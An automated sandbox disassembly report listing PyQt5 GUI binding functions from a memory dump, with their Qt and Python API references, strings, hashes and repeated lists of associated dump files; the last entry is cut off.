Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?idealDocument@@DoubleFloat_FromTextWidth@
String ID: QTextDocument$idealWidth$idealWidth(self) -> float
API String ID: 3081139339-56287783
Opcode ID: 1ad385ea484b0646642e3fa147a4d124338faa24c6cce3e956007e637d1f1fd5
Instruction ID: 353ba931598e3200a563e20f032c180abf0e3a88bc4905079b71cbf667a872de
Opcode Fuzzy Hash: 1ad385ea484b0646642e3fa147a4d124338faa24c6cce3e956007e637d1f1fd5
Instruction Fuzzy Hash: 4601E835B08A46C1EB00AF65E8A96AD33A4FB44B64F954076CA5D47320DF7DDE8AC780

Function 00007FFD8623AD40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?width@QTextItem@@QEBANXZ.QT5GUI ref: 00007FFD8623AD8B
PyFloat_FromDouble.PYTHON3 ref: 00007FFD8623AD91

Strings

QTextItem, xrefs: 00007FFD8623ADB6
width, xrefs: 00007FFD8623ADAF
width(self) -> float, xrefs: 00007FFD8623ADA3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?width@DoubleFloat_FromItem@@Text
String ID: QTextItem$width$width(self) -> float
API String ID: 653012813-4041385443
Opcode ID: 8021a6dda8f4a6267b36dd29607f84608ac8add0e82d6749cd20a5e8ab1ae780
Instruction ID: f5e930e2be18316718d0f7d10ef28056d8a3500693b421ee510c8a2cd3f0a95b
Opcode Fuzzy Hash: 8021a6dda8f4a6267b36dd29607f84608ac8add0e82d6749cd20a5e8ab1ae780
Instruction Fuzzy Hash: 23011631B08A4681EB00AF54E8A86AD37A4FB44BA4F950072CA4D43320DF7DEA4AC340

Function 00007FFD8624AD90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?height@QTextInlineObject@@QEBANXZ.QT5GUI ref: 00007FFD8624ADDB
PyFloat_FromDouble.PYTHON3 ref: 00007FFD8624ADE1

Strings

QTextInlineObject, xrefs: 00007FFD8624AE06
height(self) -> float, xrefs: 00007FFD8624ADF3
height, xrefs: 00007FFD8624ADFF

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?height@DoubleFloat_FromInlineObject@@Text
String ID: QTextInlineObject$height$height(self) -> float
API String ID: 1099672162-2441190664
Opcode ID: 7505ac849dc1744c400bf611e920383c26a56241dea8bf74bd7b83f0890a33da
Instruction ID: 45f5fdaef096b5969c37f71bf47fb698dec62e51f51cbb9134d2b80b59f6cd0d
Opcode Fuzzy Hash: 7505ac849dc1744c400bf611e920383c26a56241dea8bf74bd7b83f0890a33da
Instruction Fuzzy Hash: 3B011631B08A46C1EB00AF54E8A86AD33A8FB44B65F954072CA4C43320DF7CDA89C380

Function 00007FFD86262DB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?topMargin@QTextFrameFormat@@QEBANXZ.QT5GUI ref: 00007FFD86262DFB
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86262E01

Strings

topMargin, xrefs: 00007FFD86262E1F
topMargin(self) -> float, xrefs: 00007FFD86262E13
QTextFrameFormat, xrefs: 00007FFD86262E26

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?topDoubleFloat_Format@@FrameFromMargin@Text
String ID: QTextFrameFormat$topMargin$topMargin(self) -> float
API String ID: 3737809249-1340464801
Opcode ID: dcc5f0691756520572f08797a1fee819f141438f33c5c05ee1db31513f743ce9
Instruction ID: bbc78d40bb24939429bb3fbbf0ca58b9183a953db92e020668f057938389998d
Opcode Fuzzy Hash: dcc5f0691756520572f08797a1fee819f141438f33c5c05ee1db31513f743ce9
Instruction Fuzzy Hash: 53010475B08A4691EB00AF64E8A96A933A4FB54B64F954072CA4D43330DF7DEA8AC740

Function 00007FFD86256E30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?physicalDotsPerInchY@QScreen@@QEBANXZ.QT5GUI ref: 00007FFD86256E7B
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86256E81

Strings

physicalDotsPerInchY, xrefs: 00007FFD86256E9F
physicalDotsPerInchY(self) -> float, xrefs: 00007FFD86256E93
QScreen, xrefs: 00007FFD86256EA6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?physicalDotsDoubleFloat_FromInchScreen@@
String ID: QScreen$physicalDotsPerInchY$physicalDotsPerInchY(self) -> float
API String ID: 3992396491-2417228039
Opcode ID: 60ab32af7bf293da326151583f9c9a782af0b9d81ba4255cbb11730b0e6a5f3d
Instruction ID: 8b6670bf959d4f1c4e233590c8a25064acaa5374f53a313d32cfececdbff2a1b
Opcode Fuzzy Hash: 60ab32af7bf293da326151583f9c9a782af0b9d81ba4255cbb11730b0e6a5f3d
Instruction Fuzzy Hash: 3401EC75B08A56C1EB00AF54E8986AD37A4FB44B64F954072CA5D43330DF7DDE9AC340

Function 00007FFD86226EF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

?remove@?$QVector@VQPointF@@@@QEAAXH@Z.QT5CORE ref: 00007FFD86226F76
?remove@?$QVector@VQPointF@@@@QEAAXH@Z.QT5CORE ref: 00007FFD86227015

Strings

__delitem__, xrefs: 00007FFD86227050
QPolygonF, xrefs: 00007FFD8622705C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?remove@?$F@@@@PointVector@
String ID: QPolygonF$__delitem__
API String ID: 1048307195-783516681
Opcode ID: b383495312a614f0c5fb1b636abcfb89ab009f1a82b13e7c87afc582e418133c
Instruction ID: 18314fb9cc04b1ade82d15a5c4a0385329e644f6fe6a44f0068d6f2954903973
Opcode Fuzzy Hash: b383495312a614f0c5fb1b636abcfb89ab009f1a82b13e7c87afc582e418133c
Instruction Fuzzy Hash: 2D41CA32B0CA8682EB408F19F4945AEB7A5FB84BA4F544172EB8D47B68DF3CD555CB00

Function 00007FFD862A0EE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

??0QRegularExpressionValidator@@QEAA@PEAVQObject@@@Z.QT5GUI ref: 00007FFD862A0F70
??0QRegularExpressionValidator@@QEAA@AEBVQRegularExpression@@PEAVQObject@@@Z.QT5GUI ref: 00007FFD862A1020

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

|JH, xrefs: 00007FFD862A0F33
J9|JH, xrefs: 00007FFD862A0FDB

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Regular$ExpressionObject@@@Validator@@$Expression@@malloc
String ID: J9|JH$|JH
API String ID: 1027235270-3667235532
Opcode ID: f7dabe2b428eff0c6a854729715e9b3e914ddcd2c0a0f391777f155201dab5da
Instruction ID: e7eb6d86201a39156f87620c8b52ac8345fc6c36e6ae60ccdcaaaa7808f37262
Opcode Fuzzy Hash: f7dabe2b428eff0c6a854729715e9b3e914ddcd2c0a0f391777f155201dab5da
Instruction Fuzzy Hash: 66411336708B8589DB50CF16E89869E73A8FB49BA0F29017ADE9D43724DF3CD994C340

Function 00007FFD86264F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

??8QPen@@QEBA_NAEBV0@@Z.QT5GUI ref: 00007FFD86264FFF
PyBool_FromLong.PYTHON3 ref: 00007FFD8626502C

Strings

1J1, xrefs: 00007FFD86264FB8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLongPen@@V0@@
String ID: 1J1
API String ID: 807029516-2174808320
Opcode ID: bf11ebe66846da8191c8110932da44bfefad18f3873098d278c69e1f16ecf40a
Instruction ID: 7dee326fc35e6821ca9d04cbb90c39e44f6c63174cb024aed2aaf95e9a5b0213
Opcode Fuzzy Hash: bf11ebe66846da8191c8110932da44bfefad18f3873098d278c69e1f16ecf40a
Instruction Fuzzy Hash: FF31E936B0CB8182EA508F56F45416EB7A5FB88BE4F044172EE8D13B68DF2CE845CB00

Function 00007FFD86246DA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFD86246E47

Strings

QPixelFormat, xrefs: 00007FFD86246E6D
channelCount, xrefs: 00007FFD86246E66
channelCount(self) -> int, xrefs: 00007FFD86246E5A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QPixelFormat$channelCount$channelCount(self) -> int
API String ID: 3417993445-2214000653
Opcode ID: 50ce74642a62cdeda91f21d94c74c096d223734f11d328bce0456de45ee19ac9
Instruction ID: 9aa0723a78114b0fc284eca5ebf2d1d696ff11db10c9a85a552eade36220d952
Opcode Fuzzy Hash: 50ce74642a62cdeda91f21d94c74c096d223734f11d328bce0456de45ee19ac9
Instruction Fuzzy Hash: E4216075B19B0A83EF049F59D9986AC2395FB087A4F898035CD5D9B320EF7CE959C340

Function 00007FFD8623CE70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

??H?$QVector@VQPoint@@@@QEBA?AV0@AEBV0@@Z.QT5CORE ref: 00007FFD8623CEF9
??0QPolygon@@QEAA@$$QEAV0@@Z.QT5GUI ref: 00007FFD8623CF05
??1?$QVector@VQPoint@@@@QEAA@XZ.QT5CORE ref: 00007FFD8623CF13

Strings

1J9, xrefs: 00007FFD8623CEB6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Point@@@@V0@@Vector@$??1?$A@$$Polygon@@malloc
String ID: 1J9
API String ID: 1112837069-2407233842
Opcode ID: 628af6f8fed6b263d44f0b4a3d4e73de35a8bd124b7a2ca5cee463a6025fc384
Instruction ID: 71cedf49ddb739d5419eca9f97ad6b70f21aa59547fc11320619dc15b544f1d7
